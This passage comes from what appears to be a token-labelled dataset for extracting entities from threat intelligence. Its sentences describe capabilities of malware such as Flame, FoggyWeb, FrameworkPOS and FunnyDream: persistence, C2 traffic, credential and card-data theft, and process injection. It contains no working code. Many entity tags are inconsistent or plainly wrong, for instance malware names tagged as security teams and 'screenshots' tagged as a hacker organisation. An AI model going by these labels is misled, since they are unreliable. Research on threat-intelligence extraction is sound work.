"protocol,", - "acting", - "as", - "a", - "Bluetooth", - "beacon,", - "and", - "identifying", - "other", - "Bluetooth", - "devices", - "in", - "the", - "vicinity." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "can", - "use", - "MS10-061", - "to", - "exploit", - "a", - "print", - "spooler", - "vulnerability", - "in", - "a", - "remote", - "system", - "with", - "a", - "shared", - "printer", - "in", - "order", - "to", - "move", - "laterally." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "I-Exp", - "O", - "B-Exp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "can", - "create", - "backdoor", - "accounts", - "with", - "login", - "“HelpAssistant”", - "on", - "domain", - "connected", - "systems", - "if", - "appropriate", - "rights", - "are", - "available." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "B-Purp", - "B-HackOrg", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "contains", - "modules", - "to", - "infect", - "USB", - "sticks", - "and", - "spread", - "laterally", - "to", - "other", - "Windows", - "systems", - "the", - "stick", - "is", - "plugged", - "into", - "using", - "Autorun", - "functionality." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "B-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Rundll32.exe", - "is", - "used", - "as", - "a", - "way", - "of", - "executing", - "Flame", - "at", - "the", - "command-line." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "can", - "take", - "regular", - "screenshots", - "when", - "certain", - "applications", - "are", - "open", - "that", - "are", - "sent", - "to", - "the", - "command", - "and", - "control", - "server." - ], - "ner_tags": [ - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Flame", - "identifies", - "security", - "software", - "such", - "as", - "antivirus", - "through", - "the", - "Security", - "module." - ], - "ner_tags": [ - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "collect", - "clipboard", - "data." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "may", - "obfuscate", - "portions", - "of", - "the", - "initial", - "C2", - "handshake." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "collected", - "information", - "and", - "files", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "sent", - "data", - "collected", - "from", - "a", - "compromised", - "host", - "to", - "its", - "C2", - "servers." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "execute", - "batch", - "scripts", - "to", - "delete", - "files." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "transfer", - "files", - "from", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "collect", - "mouse", - "events." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "collect", - "keyboard", - "events." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "I-Features", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "enumerates", - "the", - "privilege", - "level", - "of", - "the", - "victim", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "been", - "installed", - "via", - "`msiexec.exe`." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "will", - "attempt", - "to", - "detect", - "if", - "a", - "usable", - "smart", - "card", - "is", - "current", - "inserted", - "into", - "a", - "card", - "reader." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "used", - "PowerShell", - "to", - "execute", - "commands." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "established", - "persistence", - "via", - "the", - "`HKCU\\SOFTWARE\\microsoft\\windows\\currentversion\\run`", - "registry", - "key." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "used", - "`rundll32`", - "for", - "execution." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "capture", - "screenshots." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "will", - "attempt", - "to", - "detect", - "anti-virus", - "products", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "used", - "SEAL", - "encryption", - "during", - "the", - "initial", - "C2", - "handshake." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "can", - "collect", - "the", - "victim's", - "operating", - "system", - "and", - "computer", - "name", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "enumerates", - "the", - "current", - "user", - "during", - "the", - "initial", - "infection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "used", - "HTTP", - "for", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "has", - "used", - "`cmd`", - "to", - "execute", - "commands", - "on", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedAmmyy", - "leverages", - "WMI", - "to", - "enumerate", - "anti-virus", - "on", - "the", - "victim." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FlawedGrace", - "encrypts", - "its", - "C2", - "configuration", - "files", - "with", - "AES", - "in", - "CBC", - "mode." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "use", - "a", - "dynamic", - "XOR", - "key", - "and", - "a", - "custom", - "XOR", - "methodology", - "to", - "encode", - "data", - "before", - "exfiltration.", - "Also,", - "FoggyWeb", - "can", - "encode", - "C2", - "command", - "output", - "within", - "a", - "legitimate", - "WebP", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "invoke", - "the", - "`Common.Compress`", - "method", - "to", - "compress", - "data", - "with", - "the", - "C#", - "GZipStream", - "compression", - "class." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "compile", - "and", - "execute", - "source", - "code", - "sent", - "to", - "the", - "compromised", - "AD", - "FS", - "server", - "via", - "a", - "specific", - "HTTP", - "POST." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "has", - "used", - "DLL", - "Search", - "Order", - "Hijacking", - "to", - "load", - "malicious", - "code", - "instead", - "of", - "the", - "legitimate", - "`version.dll`", - "during", - "the", - "`Microsoft.IdentityServer.ServiceHost.exe`", - "execution", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "B-SamFile", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "retrieve", - "configuration", - "data", - "from", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "be", - "decrypted", - "in", - "memory", - "using", - "a", - "Lightweight", - "Encryption", - "Algorithm", - "(LEA)-128", - "key", - "and", - "decoded", - "using", - "a", - "XOR", - "key." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "has", - "been", - "XOR-encoded." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "remotely", - "exfiltrate", - "sensitive", - "information", - "from", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "B-Features", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "can", - "check", - "for", - "the", - "FoggyWeb", - "backdoor", - ".pri", - "file", - "on", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "receive", - "additional", - "malicious", - "components", - "from", - "an", - "actor", - "controlled", - "C2", - "server", - "and", - "execute", - "them", - "on", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "masquerade", - "the", - "output", - "of", - "C2", - "commands", - "as", - "a", - "fake,", - "but", - "legitimately", - "formatted", - "WebP", - "file." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "be", - "disguised", - "as", - "a", - "Visual", - "Studio", - "file", - "such", - "as", - "`Windows.Data.TimeZones.zh-PH.pri`", - "to", - "evade", - "detection.", - "Also,", - "FoggyWeb's", - "loader", - "can", - "mimic", - "a", - "genuine", - "`dll`", - "file", - "that", - "carries", - "out", - "the", - "same", - "import", - "functions", - "as", - "the", - "legitimate", - "Windows", - "`version.dll`", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-Features", - "B-Way", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "can", - "use", - "API", - "functions", - "to", - "load", - "the", - "FoggyWeb", - "backdoor", - "into", - "the", - "same", - "Application", - "Domain", - "within", - "which", - "the", - "legitimate", - "AD", - "FS", - "managed", - "code", - "is", - "executed." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "configure", - "custom", - "listeners", - "to", - "passively", - "monitor", - "all", - "incoming", - "HTTP", - "GET", - "and", - "POST", - "requests", - "sent", - "to", - "the", - "AD", - "FS", - "server", - "from", - "the", - "intranet/internet", - "and", - "intercept", - "HTTP", - "requests", - "that", - "match", - "the", - "custom", - "URI", - "patterns", - "defined", - "by", - "the", - "actor." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "retrieve", - "token", - "signing", - "certificates", - "and", - "token", - "decryption", - "certificates", - "from", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Purp", - "I-Purp", - "B-Features", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "can", - "enumerate", - "all", - "Common", - "Language", - "Runtimes", - "(CLRs)", - "and", - "running", - "Application", - "Domains", - "in", - "the", - "compromised", - "AD", - "FS", - "server's", - "<code>Microsoft.IdentityServer.ServiceHost.exe</code>", - "process." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "has", - "reflectively", - "loaded", - ".NET-based", - "assembly/payloads", - "into", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-HackOrg", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb's", - "loader", - "can", - "call", - "the", - "<code>load()</code>", - "function", - "to", - "load", - "the", - "FoggyWeb", - "dll", - "into", - "an", - "Application", - "Domain", - "on", - "a", - "compromised", - "AD", - "FS", - "server." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "has", - "used", - "a", - "dynamic", - "XOR", - "key", - "and", - "custom", - "XOR", - "methodology", - "for", - "C2", - "communications." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "can", - "allow", - "abuse", - "of", - "a", - "compromised", - "AD", - "FS", - "server's", - "SAML", - "token." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FoggyWeb", - "has", - "the", - "ability", - "to", - "communicate", - "with", - "C2", - "servers", - "over", - "HTTP", - "GET/POST", - "requests." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Forfiles", - "can", - "be", - "used", - "to", - "act", - "on", - "(ex:", - "copy,", - "move,", - "etc.)", - "files/directories", - "in", - "a", - "system", - "during", - "(ex:", - "copy", - "files", - "into", - "a", - "staging", - "area", - "before)." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "B-Features", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Forfiles", - "can", - "be", - "used", - "to", - "locate", - "certain", - "types", - "of", - "files/directories", - "in", - "a", - "system.(ex:", - "locate", - "all", - "files", - "with", - "a", - "specific", - "extension,", - "name,", - "and/or", - "age)" - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Forfiles", - "can", - "be", - "used", - "to", - "subvert", - "controls", - "and", - "possibly", - "conceal", - "command", - "execution", - "by", - "not", - "directly", - "invoking", - "cmd." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "B-Features", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-SamFile" - ] - }, - { - "tokens": [ - "FrameworkPOS", - "can", - "XOR", - "credit", - "card", - "information", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FrameworkPOS", - "can", - "collect", - "elements", - "related", - "to", - "credit", - "card", - "data", - "from", - "process", - "memory." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FrameworkPOS", - "can", - "use", - "DNS", - "tunneling", - "for", - "exfiltration", - "of", - "credit", - "card", - "data." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FrameworkPOS", - "can", - "identifiy", - "payment", - "card", - "track", - "data", - "on", - "the", - "victim", - "and", - "copy", - "it", - "to", - "a", - "local", - "file", - "in", - "a", - "subdirectory", - "of", - "C:\\Windows\\." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FrameworkPOS", - "can", - "enumerate", - "and", - "exclude", - "selected", - "processes", - "on", - "a", - "compromised", - "host", - "to", - "speed", - "execution", - "of", - "memory", - "scraping." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "executes", - "and", - "stores", - "obfuscated", - "Perl", - "scripts." - ], - "ner_tags": [ - "B-Time", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "FruitFly", - "will", - "delete", - "files", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "looks", - "for", - "specific", - "files", - "and", - "file", - "types." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "saves", - "itself", - "with", - "a", - "leading", - "\".\"", - "to", - "make", - "it", - "a", - "hidden", - "file." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "persists", - "via", - "a", - "Launch", - "Agent." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "has", - "the", - "ability", - "to", - "list", - "processes", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FruitFly", - "takes", - "screenshots", - "of", - "the", - "user's", - "desktop." - ], - "ner_tags": [ - "B-Way", - "I-Features", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "the", - "ability", - "to", - "discover", - "application", - "windows", - "via", - "execution", - "of", - "`EnumWindows`." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "compressed", - "collected", - "files", - "with", - "zLib", - "and", - "encrypted", - "them", - "using", - "an", - "XOR", - "operation", - "with", - "the", - "string", - "key", - "from", - "the", - "command", - "line", - "or", - "`qwerasdf`", - "if", - "the", - "command", - "line", - "argument", - "doesn’t", - "contain", - "the", - "key.", - "File", - "names", - "are", - "obfuscated", - "using", - "XOR", - "with", - "the", - "same", - "key", - "as", - "the", - "compressed", - "file", - "content." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "compressed", - "collected", - "files", - "with", - "zLib." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "monitor", - "files", - "for", - "changes", - "and", - "automatically", - "collect", - "them." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "B-Features", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "com", - "objects", - "identified", - "with", - "`CLSID_ShellLink`(`IShellLink`", - "and", - "`IPersistFile`)", - "and", - "`WScript.Shell`(`RegWrite`", - "method)", - "to", - "enable", - "persistence", - "mechanisms." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "send", - "compressed", - "and", - "obfuscated", - "packets", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "upload", - "files", - "from", - "victims'", - "machines." - ], - "ner_tags": [ - "B-SamFile", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FunnyDream", - "FilePakMonitor", - "component", - "has", - "the", - "ability", - "to", - "collect", - "files", - "from", - "removable", - "devices." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FunnyDream", - "FilepakMonitor", - "component", - "can", - "inject", - "into", - "the", - "Bka.exe", - "process", - "using", - "the", - "`VirtualAllocEx`,", - "`WriteProcessMemory`", - "and", - "`CreateRemoteThread`", - "APIs", - "to", - "load", - "the", - "DLL", - "component." - ], - "ner_tags": [ - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "B-Features", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "Base64", - "encode", - "its", - "C2", - "address", - "stored", - "in", - "a", - "template", - "binary", - "with", - "the", - "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_-`", - "or", - "`xyz0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvw_=`", - "character", - "sets." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "execute", - "commands,", - "including", - "gathering", - "user", - "information,", - "and", - "send", - "the", - "results", - "to", - "C2." - ], - "ner_tags": [ - "B-Way", - "O", - "I-Features", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "delete", - "files", - "including", - "its", - "dropper", - "component." - ], - "ner_tags": [ - "B-Way", - "O", - "B-Features", - "I-Features", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "identify", - "files", - "with", - ".doc,", - ".docx,", - ".ppt,", - ".pptx,", - ".xls,", - ".xlsx,", - "and", - ".pdf", - "extensions", - "and", - "specific", - "timestamps", - "for", - "collection." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "B-SamFile", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "the", - "ability", - "to", - "clean", - "traces", - "of", - "malware", - "deployment." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "download", - "additional", - "files", - "onto", - "a", - "compromised", - "host." - ], - "ner_tags": [ - "B-SamFile", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "The", - "FunnyDream", - "Keyrecord", - "component", - "can", - "capture", - "keystrokes." - ], - "ner_tags": [ - "O", - "B-Way", - "B-Tool", - "O", - "O", - "I-Features", - "B-HackOrg" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "stage", - "collected", - "information", - "including", - "screen", - "captures", - "and", - "logged", - "keystrokes", - "locally." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "used", - "a", - "service", - "named", - "`WSearch`", - "for", - "execution." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "use", - "Native", - "API", - "for", - "defense", - "evasion,", - "discovery,", - "and", - "collection." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "I-Purp", - "O", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "FunnyDream", - "can", - "communicate", - "with", - "C2", - "over", - "TCP", - "and", - "UDP." - ], - "ner_tags": [ - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "The", - "FunnyDream", - "FilepakMonitor", - "component", - "can", - "detect", - "removable", - "drive", - "insertion." - ], - "ner_tags": [ - "O", - "B-Way", - "B-SecTeam", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "FunnyDream", - "has", - "the", - "ability", - "to", - "discover", - "processes,", - "including", - "`Bka.exe`", - "and", - "`BkavUtil.exe`." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - 